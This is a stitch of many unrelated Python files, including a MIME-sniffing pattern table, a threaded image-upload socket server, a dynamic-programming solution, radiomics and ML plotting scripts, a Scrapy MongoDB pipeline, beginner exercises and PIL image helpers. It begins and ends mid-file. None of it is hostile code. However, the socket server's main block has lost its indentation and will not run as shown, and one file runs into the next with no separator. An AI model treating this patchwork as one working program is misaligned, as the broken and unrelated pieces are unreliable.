    (b"ID3", b"\xff" * 3, None, b"audio/mpeg"),
    (b"OggS\x00", b"\xff" * 5, None, b"application/ogg"),
    (b"MThd\x00\x00\x00\x06", b"\xff" * 8, None, b"audio/midi"),
    # RIFF container: 4-byte size field is ignored before the AVI/WAVE tag.
    (b"RIFF\x00\x00\x00\x00AVI ", b"\xff" * 4 + b"\x00" * 4 + b"\xff" * 4, None, b"video/avi"),
    (b"RIFF\x00\x00\x00\x00WAVE", b"\xff" * 4 + b"\x00" * 4 + b"\xff" * 4, None, b"audio/wave"),
)
#: Section 6.3, step 1
#: https://mimesniff.spec.whatwg.org/commit-snapshots/609a3a3c935fbb805b46cf3d90768d695a1dcff2/#matching-a-font-type-pattern # noqa: E501
FONT_PATTERNS = (
    # Embedded OpenType: 34 arbitrary bytes, then the "LP" magic at offset 34.
    (b"\x00" * 34 + b"LP", b"\x00" * 34 + b"\xff\xff", None, b"application/vnd.ms-fontobject"),
    (b"\x00\x01\x00\x00", b"\xff" * 4, None, b"font/ttf"),
    (b"OTTO", b"\xff" * 4, None, b"font/otf"),
    (b"ttcf", b"\xff" * 4, None, b"font/collection"),
    (b"wOFF", b"\xff" * 4, None, b"font/woff"),
    (b"wOF2", b"\xff" * 4, None, b"font/woff2"),
)
#: Section 6.4, step 1
#: https://mimesniff.spec.whatwg.org/commit-snapshots/609a3a3c935fbb805b46cf3d90768d695a1dcff2/#matching-an-archive-type-pattern # noqa: E501
ARCHIVE_PATTERNS = (
    (b"\x1f\x8b\x08", b"\xff" * 3, None, b"application/x-gzip"),          # gzip
    (b"PK\x03\x04", b"\xff" * 4, None, b"application/zip"),               # zip local header
    (b"Rar \x1a\x07\x00", b"\xff" * 7, None, b"application/x-rar-compressed"),  # RAR 4.x
)
#: Section 7.1, step 1
#: https://mimesniff.spec.whatwg.org/commit-snapshots/609a3a3c935fbb805b46cf3d90768d695a1dcff2/#identifying-a-resource-with-an-unknown-mime-type # noqa: E501
# Each HTML tag is matched case-insensitively (0xDF mask bytes clear the ASCII
# case bit) and must be terminated by either a space or ">".
TEXT_PATTERNS = tuple(
    (tag + terminator, bytes.fromhex(mask_hex), WHITESPACE_BYTES, b"text/html")
    for tag, mask_hex in (
        (b"<!DOCTYPE HTML", "ffffdfdfdfdfdfdfdfffdfdfdfdfff"),
        (b"<HTML", "ffdfdfdfdfff"),
        (b"<HEAD", "ffdfdfdfdfff"),
        (b"<SCRIPT", "ffdfdfdfdfdfdfff"),
        (b"<IFRAME", "ffdfdfdfdfdfdfff"),
        (b"<H1", "ffdfffff"),
        (b"<DIV", "ffdfdfdfff"),
        (b"<FONT", "ffdfdfdfdfff"),
        (b"<TABLE", "ffdfdfdfdfdfff"),
        (b"<A", "ffdfff"),
        (b"<STYLE", "ffdfdfdfdfdfff"),
        (b"<TITLE", "ffdfdfdfdfdfff"),
        (b"<B", "ffdfff"),
        (b"<BODY", "ffdfdfdfdfff"),
        (b"<BR", "ffdfdfff"),
        (b"<P", "ffdfff"),
        (b"<!--", "ffffffffff"),
    )
    for terminator in (b" ", b">")
) + (
    # XML declaration and PDF header are matched case-sensitively.
    (b"<?xml", b"\xff\xff\xff\xff\xff", WHITESPACE_BYTES, b"text/xml"),
    (b"%PDF-", b"\xff\xff\xff\xff\xff", None, b"application/pdf"),
)
#: Section 7.1, step 2
#: https://mimesniff.spec.whatwg.org/commit-snapshots/609a3a3c935fbb805b46cf3d90768d695a1dcff2/#identifying-a-resource-with-an-unknown-mime-type # noqa: E501
# PostScript header plus byte-order-mark (UTF-16BE/LE, UTF-8) text detection;
# 0x00 mask bytes accept any byte in that position.
EXTRA_PATTERNS: Tuple[Tuple[bytes, bytes, Optional[Set[bytes]], bytes], ...] = (
    (b"%!PS-Adobe-", b"\xff" * 11, None, b"application/postscript"),
    (b"\xfe\xff\x00\x00", b"\xff\xff\x00\x00", None, b"text/plain"),
    (b"\xff\xfe\x00\x00", b"\xff\xff\x00\x00", None, b"text/plain"),
    (b"\xef\xbb\xbf\x00", b"\xff\xff\xff\x00", None, b"text/plain"),
)
|
"""
author:james.bondu
TO-DO
- Use multi Threading for handling of server sending thing ( A separate method to receive images)
Doing
- Multi Threading to both send and receive data
- There must be some way to simply check if its sending or receiving...May be try a separate thread(or main thread )to do the checking first which will invoke a separate
"""
import socket
from PIL import Image
import os
import sys
from threading import Thread
from SocketServer import ThreadingMixIn
from PIL import ImageFile
ImageFile.LOAD_TRUNCATED_IMAGES = True
"""
A proper implementation of a python script to create a web socket server and applying different image compression algorithms.
"""
class Communication:
    """Establishing the proper connection"""
    def __init__(self):
        # Listen on localhost:10013 with a backlog of one queued client.
        host = "127.0.0.1"
        port = 10013
        self.server = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        self.server.bind((host,port))
        self.server.listen(1)
        print "server set-up finished"
    def close(self):
        # Shut down the listening socket.
        self.server.close()
    def send(self,data):
        # NOTE(review): this sends on the *listening* socket, not an accepted
        # client socket, which would raise at runtime — confirm whether this
        # method is ever actually called.
        print "gonna send data"
        self.server.send(data)
class Server (Thread):
    # One thread per accepted client; the first 4 bytes received select the
    # direction of the transfer ("Recv" = client downloads, "Send" = client uploads).
    def __init__ (self,client):
        Thread.__init__(self)
        self.client = client
        print client
        print "New Thread started "+str(Thread)
        """Constructor for Threaded subclass .... So I can use it to check the initial message eveery time"""
    def run(self):
        # Read the 4-byte command sent by the client on connect.
        self.message = self.client.recv(4)
        #print self.message
        if self.message == "Recv":
            print "send Data"
            """If client gives signal it's receiving data server has to send data"""
            self.data_send(self.client)
        if self.message == "Send":
            print " Data receive"
            """If client is giving signal to receive data then server will send data"""
            self.data_receive(self.client)
    def data_send(self,client):
        # Stream Compressed.jpg to the client in <=1 KB chunks, then close.
        self.client = client
        self.path = "Compressed.jpg"
        print "prepare to send"
        print self.path
        fp = open(self.path,"rb")
        while True:
            # readline(1024): at most 1024 bytes per chunk (binary-safe enough here).
            self.data = fp.readline(1024)
            if not self.data:
                print "data sent"
                fp.close()
                self.ack = True
                self.client.close()
                break
            self.client.send(self.data)
    def data_receive(self,client):
        # Receive an uploaded image into Compressed.jpg, then compress it in place.
        self.client = client
        self.path = "Compressed.jpg"
        print self.path
        if self.client:
            self.ack = False
            print "Have you met barney"
            self.ack = self.receive_data(self.client,self.path)
            if self.ack:
                print "have you met Ted?"
                client.close()
                print "Compression Done Bro!!!"
    def receive_data(self,client,file_name):
        # Write the socket stream to file_name until the peer closes,
        # then compress the file and return True.
        self.client = client
        #self.file_name = file_name
        fp = open(file_name,"wb")
        while True:
            self.data = self.client.recv(1024)
            #print self.data
            if not self.data:
                print "data finished"
                fp.close()
                self.compress_image(file_name)
                client.close()
                self.ack = True
                return self.ack
            fp.write(self.data)
    def compress_image(self,path):
        #self.path = path
        """Compression of Images are done in this method"""
        self.img = Image.open(path)
        print self.img.size
        print os.path.getsize(path)
        # Re-save as JPEG at quality 20 to shrink the file on disk.
        self.img.save(path,optimize = True,quality = 20)
        print os.path.getsize(path)
"""
def compress_image(path):
img = Image.open(path)
print img.size
print os.path.getsize(path)
img.save(path,optimize = True,quality = 20)
print os.path.getsize(path)
def receive_data(client,file_name):
fp = open(file_name,"wb")
while True:
data = client.recv(512)
#print data
if not data:
print "data finished"
fp.close()
compress_image(file_name)
ack = False
return ack
fp.write(data)
def data_receive(client):
path = "ironman.jpg"
if client:
ack = False
#receive_data will receive image from clien,write image to disk
ack = receive_data(client,path)
if ack:
print "compression done!!!"
"""
if __name__ == "__main__":
"""basic main method"""
#data_receive()
check = Communication()
threads = []
while True:
#Thread(target = send_or_receive(check))
client,address = check.server.accept()
newthread = Server(client)
newthread.start()
threads.append(newthread)
for t in threads:
t.join()
|
INF = 100000000
h = []
dp = []
def chmin(a, b):
    """Return the smaller of a and b (a 'choose min' helper, mirroring C++ chmin)."""
    return b if b < a else a
def rec(i):
    """Memoized minimum total cost to reach platform i (Frog 1 DP, top-down)."""
    # Already solved: return the memoized value.
    if (dp[i] < INF):
        return dp[i]
    if i == 0:
        return 0  # the starting platform costs nothing to reach
    # Jump from platform i-1 ...
    best = chmin(INF, rec(i-1)+abs(h[i]-h[i-1]))
    # ... or from platform i-2, when it exists.
    if i > 1:
        best = chmin(best, rec(i-2)+abs(h[i]-h[i-2]))
    dp[i] = best
    return best
if __name__ == "__main__":
    # Read n, then n platform heights; solve Frog 1 (AtCoder Educational DP, problem A).
    n = int(input())
    for i in range(n):
        hi = int(input())
        h.append(hi)
    # dp[i] = minimum cost to reach platform i; INF marks "not yet computed".
    dp = [INF for _ in range(n)]
    print(rec(n-1))
import pandas as pd
import csv
import sklearn.cluster as cluster
import numpy as np
from sklearn.cluster import KMeans
import seaborn as sns
import matplotlib.pyplot as plt
# NOTE(review): `name` is assigned three times and `beta` twice below; only the
# final assignments take effect — the earlier lists/vectors are dead code kept
# from previous feature-selection runs.
name=[
    'label','original_glszm_GrayLevelVariance',
    'log-sigma-1-0-mm-3D_firstorder_Minimum',
    'log-sigma-3-0-mm-3D_firstorder_Median',
    'log-sigma-3-0-mm-3D_glszm_HighGrayLevelZoneEmphasis',
    'log-sigma-3-0-mm-3D_glszm_SmallAreaHighGrayLevelEmphasis',
    'log-sigma-3-0-mm-3D_ngtdm_Complexity',
    'log-sigma-5-0-mm-3D_glrlm_HighGrayLevelRunEmphasis',
    'wavelet-LH_firstorder_90Percentile',
    'wavelet-HL_firstorder_10Percentile',
    'wavelet-HH_glcm_Autocorrelation',
    'wavelet-LL_glrlm_GrayLevelNonUniformity',
    'wavelet-LL_glszm_GrayLevelNonUniformity',
    'wavelet-LL_gldm_SmallDependenceHighGrayLevelEmphasis',
]
name=['label','log-sigma-1-0-mm-3D_glszm_LargeAreaHighGrayLevelEmphasis',
    'log-sigma-3-0-mm-3D_glszm_LargeAreaHighGrayLevelEmphasis',
    'log-sigma-5-0-mm-3D_firstorder_Energy',
    'log-sigma-5-0-mm-3D_firstorder_TotalEnergy',
    'wavelet-LH_firstorder_Energy', 'wavelet-HL_firstorder_Energy',
    'wavelet-HL_firstorder_TotalEnergy', 'wavelet-LL_firstorder_Energy',
    'wavelet-LL_firstorder_TotalEnergy',
    'wavelet-LL_glcm_ClusterProminence']
# Dead: hand-pasted LASSO coefficients, replaced by the ones loaded from coefs.npy.
beta=[0.00523709,0.00682345,0.03613166,0.00517925,-0.01565185,
    0.00721222 ,-0.00670309 ,0.01241168 ,-0.00922436 ,0.01110218 ,
    -0.00577271 ,-0.00657399 ,0.00519171 ,
]
# Effective coefficients: second column of the saved coefficient matrix.
aaa=np.load('coefs.npy')
beta=aaa[:,1]
# Effective feature list: id, class label, then the 15 LASSO-selected features.
name=['id','label','original_glrlm_RunLengthNonUniformity',
    'original_glszm_LargeAreaEmphasis',
    'log-sigma-1-0-mm-3D_glszm_LargeAreaLowGrayLevelEmphasis',
    'log-sigma-1-0-mm-3D_gldm_LargeDependenceHighGrayLevelEmphasis',
    'log-sigma-3-0-mm-3D_gldm_LargeDependenceHighGrayLevelEmphasis',
    'wavelet-LH_firstorder_Variance', 'wavelet-HL_glcm_ClusterProminence',
    'wavelet-HL_ngtdm_Complexity',
    'wavelet-HH_glrlm_RunLengthNonUniformity',
    'wavelet-HH_gldm_DependenceNonUniformity',
    'wavelet-LL_firstorder_Maximum',
    'wavelet-LL_glrlm_GrayLevelNonUniformity',
    'wavelet-LL_glrlm_LongRunHighGrayLevelEmphasis',
    'wavelet-LL_glrlm_ShortRunHighGrayLevelEmphasis',
    'wavelet-LL_ngtdm_Complexity']
plt.style.use('ggplot')
# Load the feature table, keep only the selected columns, and save that subset.
with open('R_withfake_features.csv','r') as f:
    df = pd.read_csv(f)
df=df[name]
df.to_csv('15_left.csv')
# Linear (LASSO) risk score: weighted sum of the feature columns (label excluded).
score=(df.iloc[:,1:]*np.array(beta)).sum(1)
score.name='score'
df=pd.concat([df, score], axis=1)
#df = (df - df.mean()) / df.std()
#df.pop('id')
#cls=df.pop('label')
# Split by class: 1 = lesion, 0 = normal.
df1 = df.iloc[np.where(df['label']==1)[0],:]
df0 = df.iloc[np.where(df['label'] == 0)[0], :]
#df1.pop('label')
df0.pop('label')
df1.pop('label')
#df = (df - df.mean()) / df.std()
#cls.name='label'
#df=pd.concat([df,cls],axis=1)
#
# Standardize both classes using the whole-cohort mean/std so they share a scale.
df1 = (df1 - df.mean()) / df.std()
df0 = (df0 - df.mean()) / df.std()
#df1.to_csv('df1.csv')
#df0.to_csv('df0.csv')
# Per-class mean and +/- one standard deviation envelopes.
m_1=df1.mean(0).values
m_0=df0.mean(0).values
s_1=df1.std(0).values
s_0=df0.std(0).values
c=[m_1+s_1,m_1-s_1,m_0+s_0,m_0-s_0]
#fig, axes = plt.subplots()
#sns.violinplot(data=df,hue='label',x=name[2])
#plt.legend(['1','2','s','2a'])
#plt.ylim([-1,2])
plt.figure(figsize=(10,10))
# Solid lines: class means; dotted lines: mean +/- one std.
plt.plot(m_1,color='r',label='lesion')
plt.plot(c[0], linestyle='dotted',color='r')
plt.plot(c[1], linestyle='dotted', color='r')
plt.plot(m_0,color='b',label='normal')
plt.plot(c[2], linestyle='dotted',color='b')
plt.plot(c[3], linestyle='dotted', color='b')
plt.legend()
#plt.xlabel(name[1:])
# X axis: one tick per feature plus the composite score.
x = np.linspace(0, 15, 16)
plt.xticks(x, list(name[1:]+['score']), rotation=90, fontsize=10)
plt.subplots_adjust(left=0.05, wspace=0.2, hspace=0.2,
    bottom=0.49, top=0.94)
plt.title('Feature Distributions After LASSO for Diffenrent Classes')
plt.savefig('f_d.jpg')
plt.show()
a=1
|
# ROAR service endpoints — presumably consumed by request code elsewhere in
# the project (not visible here).  "Recommnd" is the server-side spelling.
RECOMMENDED_URL = "http://www.jrvdev.com/ROAR/VER1/Recommnd.asp"
BALANCE_URL = "http://www.jrvdev.com/ROAR/VER1/Overall.asp"
|
import itertools
import os
import random
import matplotlib.pyplot as plt
import numpy as np
import tensorflow as tf
def set_seeds(seed):
    """Seed every random-number source in play for reproducible runs.

    Covers Python's hash randomization, the stdlib `random` module,
    NumPy's global RNG, and TensorFlow's global seed.
    """
    os.environ["PYTHONHASHSEED"] = str(seed)
    tf.random.set_seed(seed)
    np.random.seed(seed)
    random.seed(seed)
def plot_history(history):
    """
    Plot training vs. validation accuracy per epoch from a Keras History.

    NOTE(review): despite the original comment mentioning loss curves, only
    the "accuracy" / "val_accuracy" series are actually plotted here.
    """
    plt.plot(history.history["accuracy"])
    plt.plot(history.history["val_accuracy"])
    plt.title("Model Accuracy")
    plt.ylabel("Accuracy")
    plt.xlabel("Epoch")
    plt.legend(["Train", "Validation"], loc="upper left")
    plt.show()
def plot_confusion_matrix(
    cm, classes, normalize=False, title="Confusion matrix", cmap=plt.cm.Blues
):
    """
    Plot a confusion matrix with per-cell value annotations.

    Parameters
    ----------
    cm : 2-D array of counts (rows = true labels, columns = predictions).
    classes : sequence of tick labels, one per class.
    normalize : if True, each row is scaled to sum to 1 before plotting.
    title, cmap : forwarded to matplotlib.
    """
    # Bug fix: normalization must happen *before* imshow — previously the
    # image showed raw counts while the cell text showed normalized values.
    if normalize:
        cm = cm.astype("float") / cm.sum(axis=1)[:, np.newaxis]
    plt.imshow(cm, interpolation="nearest", cmap=cmap)
    plt.title(title)
    plt.colorbar()
    tick_marks = np.arange(len(classes))
    plt.xticks(tick_marks, classes, rotation=45)
    plt.yticks(tick_marks, classes)
    # Midpoint of the value range picks black vs. white text for contrast.
    thresh = cm.max() / 2.0
    for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
        plt.text(
            j,
            i,
            format(cm[i, j], ".2f") if normalize else cm[i, j],
            horizontalalignment="center",
            color="white" if cm[i, j] > thresh else "black",
        )
    plt.tight_layout()
    plt.ylabel("True label")
    plt.xlabel("Predicted label")
    plt.show()
|
#!/usr/bin/env python
# encoding: utf-8
#
# @Author: Jon Holtzman
# @Date: March 2018
# @Filename: mkgrid
# @License: BSD 3-Clause
# @Copyright: Jon Holtzman
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
from __future__ import unicode_literals
import argparse
import os
import sys
import subprocess
import matplotlib
matplotlib.use('Agg')
import pdb
from apogee.aspcap import norm
if __name__ == '__main__' :
    parser = argparse.ArgumentParser(
        prog=os.path.basename(sys.argv[0]),
        description='Renormalize FERRE spectra based on fit')
    parser.add_argument("file", type=str, help='Input FERRE file name')
    parser.add_argument("lib", type=str, help='Input library file name')
    parser.add_argument("--write", type=str, help='Output file name', default=None)
    parser.add_argument("--plot", help='Make plots?', action="store_true")
    parser.add_argument("--done")
    parser.add_argument("--host")
    args = parser.parse_args()

    # Renormalize the spectra; output is written only when --write is given.
    norm.correct(args.file, args.lib, plot=args.plot, write=args.write)

    # Signal completion.  (Bug fix: a second, dead call
    # `subprocess.call(['setdone', done])` inside a bare try/except always
    # raised NameError on the undefined name `done` and did nothing; removed.)
    if args.done is not None :
        subprocess.call(['setdone', args.done])

    print('host', args.host)
    # Remove the per-host marker file, if any.  Requires both --done and
    # --host (previously a missing --done raised TypeError, silently eaten
    # by a bare except); a missing file is not an error.
    if args.host is not None and args.done is not None :
        try:
            os.remove(args.done + '.' + args.host)
        except OSError:
            pass
|
import board
import busio
# I2C bus handle for the ADS1x15 ADC.
# NOTE(review): i2c / ADS / AnalogIn are never used in the code below, which
# reads only the SPI-attached MCP3008 — confirm whether the ADS path is dead.
i2c = busio.I2C(board.SCL, board.SDA)
import adafruit_ads1x15.ads1115 as ADS
from adafruit_ads1x15.analog_in import AnalogIn
import time
import numpy as np
import matplotlib.pyplot as plt
# Import SPI library (for hardware SPI) and MCP3008 library.
import Adafruit_GPIO.SPI as SPI
import Adafruit_MCP3008
# Hardware SPI configuration:
SPI_PORT = 0
SPI_DEVICE = 0
mcp = Adafruit_MCP3008.MCP3008(spi=SPI.SpiDev(SPI_PORT, SPI_DEVICE))

# Main program loop: sample ADC channel 0 as fast as possible and report
# the achieved sample rate.
NUM_SAMPLES = 20000
start_time = time.time()
values = []
for _ in range(NUM_SAMPLES):
    values.append(mcp.read_adc(0))
finish_time = time.time()
elapsed = finish_time - start_time
print(values)
# Bug fix: the message previously claimed "1000 samples" and divided by a
# hard-coded 1000 even though 20000 samples are collected (and had a stray
# ')' in the output); report the real count and rate.
print(f"{len(values)} samples collected in {elapsed} seconds, rate of {len(values) / elapsed}")
plt.plot(values)
plt.show()
|
# O(n) Time | O(n) Space, where n is total elements in array
def zigzagTraverse(array):
    """Return the elements of a rectangular 2-D matrix in zigzag order.

    The walk starts at the top-left corner heading down-left, then bounces
    between the matrix edges along anti-diagonals.  Cells on the same
    anti-diagonal d (where row + col == d) are visited top-to-bottom when d
    is even and bottom-to-top when d is odd, which reproduces the classic
    pointer-walking traversal exactly.
    """
    if not array or not array[0]:
        return []
    num_rows, num_cols = len(array), len(array[0])
    ordering = []
    for diag in range(num_rows + num_cols - 1):
        # Rows that intersect this anti-diagonal.
        first_row = max(0, diag - num_cols + 1)
        last_row = min(diag, num_rows - 1)
        if diag % 2:
            rows = range(last_row, first_row - 1, -1)  # odd: walk upward
        else:
            rows = range(first_row, last_row + 1)      # even: walk downward
        ordering.extend(array[r][diag - r] for r in rows)
    return ordering
|
import re
import cPickle
from foreclosure import Foreclosure
# Scrape the quarterly foreclosure HTML spreadsheets (2007-2009) into
# Foreclosure objects and pickle the full list.
# NOTE: legacy Python 2 code (print statement, cPickle, file()).
foreclosures = []
for year in ["2007", "2008", "2009"]:
    for q in ["1","2","3","4"]:
        f = file("data/spreadsheet%s.cfm" % (year+"Q"+q)).read()
        pl = len(foreclosures)  # NOTE(review): computed but never used
        first = True
        print year, q
        for row in re.findall("<tr>(.*?)</tr>", f, re.S):
            if first:
                # The first <tr> carries the <th> column headers, which
                # become the dict keys for every following data row.
                format = [r.strip() for r in re.findall("<th>(.*?)</th>", row, re.S)]
                first = False
                continue
            vals = [r.strip() for r in re.findall("<td>(.*?)</td>", row, re.S)]
            foreclosures.append(Foreclosure(dict(zip(format, vals))))
#manually counted foreclosures as of nov/2/09
assert len(foreclosures) == 13333
cPickle.dump(foreclosures, file("theforeclosures.pkl", "w"))
|
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
from scrapy.exceptions import DropItem
from scrapy.conf import settings
from scrapy import log
import pymongo
#class ValidateItemPipeline(object):
# def process_item(self, item, spider):
# if not all(item.values()):
# raise DropItem("Missing values!")
# else:
# return item
#class TestPipeline(object):
# def __init__(self):
# self.file = open('Boardgames.txt', 'w')
#
# def process_item(self, item, spider):
# line = str(item['rank'][0]) + '\t' + str(item['title'][0])\
# +'\t' + str(item['year'][0]) + '\t'\
# + str(item['gRating'][0]) + '\t' + str(item['avgRating'][0])+ '\t'\
# + str(item['voters'][0]) + '\t' + str(item['ranks'][0])+ '\t'\
# + str(item['typeg'][0]) + '\t' + str(item['category'][0])+ '\t'\
# + str(item['mechanisms'][0]) + '\t' + str(item['age'][0])+ '\t'\
# + str(item['players'][0])+ '\t'\
# + str(item['dificulty'][0]) + '\t' + str(item['language'][0])+ '\t' \
# + str(item['description'][0]) + '\t' + str(item['price'][0]) + '\t' \
# + str(item['timemin'][0]) + '\t' + str(item['timemax'][0]) + '\t' \
# +'\n'
# self.file.write(line)
# return item
class MongoDBPipeline(object):
    """Scrapy item pipeline that stores every scraped item in MongoDB.

    Connection parameters (server/port/db/collection) are read from the
    project's Scrapy settings.  NOTE(review): `scrapy.conf.settings`,
    `scrapy.log`, and `pymongo.Collection.insert` are all long-deprecated
    APIs (removed in modern releases) — this code is pinned to old library
    versions; confirm before upgrading.
    """
    def __init__(self):
        # Resolve the target collection once, when the crawl starts.
        connection = pymongo.MongoClient(
            settings['MONGODB_SERVER'],
            settings['MONGODB_PORT']
        )
        db = connection[settings['MONGODB_DB']]
        self.collection = db[settings['MONGODB_COLLECTION']]
    def process_item(self, item, spider):
        # Persist a plain-dict snapshot; returning the item lets any later
        # pipelines continue processing it.
        self.collection.insert(dict(item))
        log.msg("Added to MongoDB database!",
                level=log.DEBUG, spider=spider)
        return item
#!/usr/local/bin/python3
'''
----------------------------------------------------
Author: Vivian Ta
LAB 5-1
1) Create an application that uses a dictionary to hold the following data:
--------------------------------------
(1, 'Bob Smith', 'BSmith@Hotmail.com')
--------------------------------------
(2, 'Sue Jones', 'SueJ@Yahoo.com')
--------------------------------------
(3, 'Joe James', 'JoeJames@Gmail.com')
2) Add code that lets users append a new row of data
3) Add a loop that lets the user keep adding rows.
4) Ask the user if they want to save the data to a file when they exit the loop.
5) Save the data to a file if they say 'yes.'
'''
# Seed data: three contact records keyed by ID/Name/Email.
dict1 = {"ID":1, "Name":"Bob Smith", "Email":"BSmith@Hotmail.com"}
dict2 = {"ID":2, "Name":"Sue Jones", "Email":"SueJ@Yahoo.com"}
dict3 = {"ID":3, "Name":"Joe James", "Email":"JoeJames@Gmail.com"}
dict_collection = [dict1, dict2, dict3]

# Keep appending user-entered rows until they answer 'n'.
while True:
    record_id = int(input("ID: "))  # renamed from `id` to avoid shadowing the builtin
    name = input("Name: ")
    email = input("Email: ")
    new_row = {"ID":record_id, "Name":name, "Email":email}
    # new_row is rebound on every iteration, so no defensive dict() copy is needed.
    dict_collection.append(new_row)
    prompt = input("Add another? y/n ")
    if prompt.lower() == 'n': break

# Optionally persist every row (seed rows plus additions) to /tmp/dict.txt.
save = input("Did you want to save the items you added to /tmp/dict.txt? y/n ")
if save.lower() == 'y':
    # `with` guarantees the file is closed even if a write fails.
    with open("/tmp/dict.txt", "a") as outfile:
        for row in dict_collection:
            outfile.write(str(row) + '\n')
|
# (Bug fix: leftover empty git merge-conflict markers that preceded this
# function have been removed; they made the file unparseable.)
def cheese_and_crackers(cheese_count, boxes_of_crackers):
    """Print a short party-supplies report for the given cheese and cracker counts."""
    print(f"You have {cheese_count} cheeses!")
    print(f"You have {boxes_of_crackers} boxes of crackers!")
    print("Man that's enough for a party!")
    print("Get a blanket. \n")
# Demonstrations of the different ways arguments can be supplied to a
# function: literals, variables, expressions, and user input.
print("We can just give the function numbers directly:")
cheese_and_crackers(20, 30)
print("OR, we can use variables from our script:")
amount_of_cheese = 10
amount_of_crackers = 50
cheese_and_crackers(amount_of_cheese, amount_of_crackers)
print("We can even do math inside too:")
cheese_and_crackers(10 + 20, 5 + 6)
print("And we can combine the two, variables and math:")
cheese_and_crackers(amount_of_cheese + 100, amount_of_crackers + 1000)
# Finally, values typed by the user.  ("Plese" typo is a runtime prompt
# string, so it is left unchanged in this doc-only pass.)
getyourcheese = int(input("Plese input a number of cheese you want:> "))
getyourcrackers = int(input("Input crackers you want:> "))
cheese_and_crackers(getyourcheese, getyourcrackers)
|
import seaborn as sns
import matplotlib.pyplot as plt
import matplotlib.colors as colors
from matplotlib.collections import LineCollection
from .genomeutil import get_intervaltree
class ColorUniversalDesign():
    # Okabe & Ito's color palette
    # Color Universal Design (CUD) - How to make figures and presentations that are friendly to Colorblind people -
    # https://jfly.uni-koeln.de/color/
    # The eight CUD hex codes live in one list so the matplotlib colormap and
    # the seaborn palette cannot drift apart (the string was duplicated before).
    OKABE_ITO_HEX = '#E69F00 #56B4E9 #009E73 #F0E442 #0072B2 #D55E00 #CC79A7 #000000'.split()
    OkabeIto_cmap = colors.ListedColormap(OKABE_ITO_HEX)
    OkabeIto_cpal = sns.color_palette(OKABE_ITO_HEX)
class SyntenyViewer():
    """Render genomic features in a window as horizontal segments on a
    matplotlib axis, with optional strand-aware text labels."""
    def __init__(self, rec):
        # rec: annotated sequence record (presumably Biopython-like — confirm
        # against get_intervaltree's expectations).  An interval tree over its
        # features is built once so window queries in show() are fast.
        self.__rec = rec
        self.__intervals = get_intervaltree(self.__rec)
    def show(self, start, end, y_func=None, label_func=None, label_kwargs=None, collection_kwargs=None, feature_filter=None, ax=None):
        """Draw features overlapping [start, end] and return the axis drawn on.

        y_func maps a feature to its y coordinate (default: all at y=0);
        label_func, when given, maps a feature to its text label;
        feature_filter selects which features are drawn (default: all).
        """
        # Handle default args
        y_func = y_func or (lambda _: 0)
        label_kwargs = label_kwargs or {}
        collection_kwargs = collection_kwargs or {}
        feature_filter = feature_filter or (lambda _: True)
        ax = ax or plt.gca()
        # Draw features as segments.  The comprehension's loop variables reuse
        # the names start/end for each feature's own interval; the outer
        # start/end are unaffected (Python 3 comprehension scoping).
        ax.add_collection(LineCollection([
            [(start, y_func(feature)), (end, y_func(feature))]
            for start, end, feature in self.__intervals[start:end]
            if feature_filter(feature)
        ], **collection_kwargs))
        # Add text information, anchored at the 5' end of each feature.
        if label_func is not None:
            for s, e, data in self.__intervals[start:end]:
                if feature_filter(data):
                    ax.text(
                        s if data.strand>0 else e, y_func(data), label_func(data),
                        ha='left' if data.strand>0 else 'right', va='center', **label_kwargs
                    )
        ax.autoscale()
        ax.set_xlim(start, end)
        ax.set_xlabel('genomic position (bp)')
        return ax
from PIL import Image
def copyImage(source):
    """Return a new RGB image containing a pixel-for-pixel copy of `source`."""
    width, height = source.size
    duplicate = Image.new("RGB", source.size)
    for col in range(width):
        for row in range(height):
            duplicate.putpixel((col, row), source.getpixel((col, row)))
    return duplicate
def drawBox(source, start, size, color):
    """Return a copy of `source` with a solid size[0] x size[1] rectangle of
    `color` whose top-left corner sits at `start`.

    The input image is not modified.  No clipping is performed, so the box
    must lie entirely inside the image.  (The unused local `endpoints` was
    removed.)
    """
    dest = copyImage(source)
    for x in range(size[0]):  # range through each pixel in our block
        for y in range(size[1]):
            dest.putpixel((x + start[0], y + start[1]), color)
    return dest
def GetBlock(source_img, loc, copy_size):
    """Return a new `copy_size` RGB image copied out of `source_img`,
    starting at top-left corner `loc`."""
    left, top = loc
    width, height = copy_size
    block = Image.new("RGB", copy_size)
    for dx in range(width):
        for dy in range(height):
            block.putpixel((dx, dy), source_img.getpixel((left + dx, top + dy)))
    return block
def PutBlock(small_img, destination, loc):
    """Paste `small_img` into `destination` in place, top-left corner at `loc`.

    Mutates `destination` and returns None.  No clipping is performed, so the
    block must fit inside the destination.  (The unused locals deswid/deshei
    were removed.)
    """
    smallwid, smallhei = small_img.size
    for x in range(loc[0], loc[0] + smallwid):
        for y in range(loc[1], loc[1] + smallhei):
            color = small_img.getpixel((x - loc[0], y - loc[1]))
            destination.putpixel((x, y), color)
def scale(origImage, widthFactor, heightFactor):
    """Return `origImage` resized by the given factors, using
    nearest-neighbour sampling from the original pixels."""
    new_w = int(origImage.size[0] * widthFactor)
    new_h = int(origImage.size[1] * heightFactor)
    scaled = Image.new("RGB", (new_w, new_h))
    for col in range(new_w):
        src_x = int(col / widthFactor)  # invariant for the inner loop
        for row in range(new_h):
            scaled.putpixel((col, row), origImage.getpixel((src_x, int(row / heightFactor))))
    return scaled
def CheckerBoard(img1, img2, block_size):
    """Return a checkerboard composite of `img1` and `img2`.

    Both images are rescaled to a common size — that of the smaller image,
    snapped down to a multiple of `block_size` — and blocks are then taken
    alternately from each scaled image.

    Fixes relative to the original:
    * integer `//` division — under Python 3 the old `/` produced floats,
      which crash `Image.new` and `range`;
    * the second scale factor was computed as `float(newhg/hg2)` instead of
      `float(newhg)/hg2`;
    * the rescaled images are now actually used as block sources (they were
      previously computed and then ignored in favour of the originals).
    """
    wid1, hg1 = img1.size
    wid2, hg2 = img2.size
    if wid1 * hg1 < wid2 * hg2:
        newwid = (wid1 // block_size) * block_size
        newhg = (hg1 // block_size) * block_size
    else:
        newwid = (wid2 // block_size) * block_size
        newhg = (hg2 // block_size) * block_size
    scale_newimg1 = scale(img1, float(newwid) / wid1, float(newhg) / hg1)
    scale_newimg2 = scale(img2, float(newwid) / wid2, float(newhg) / hg2)
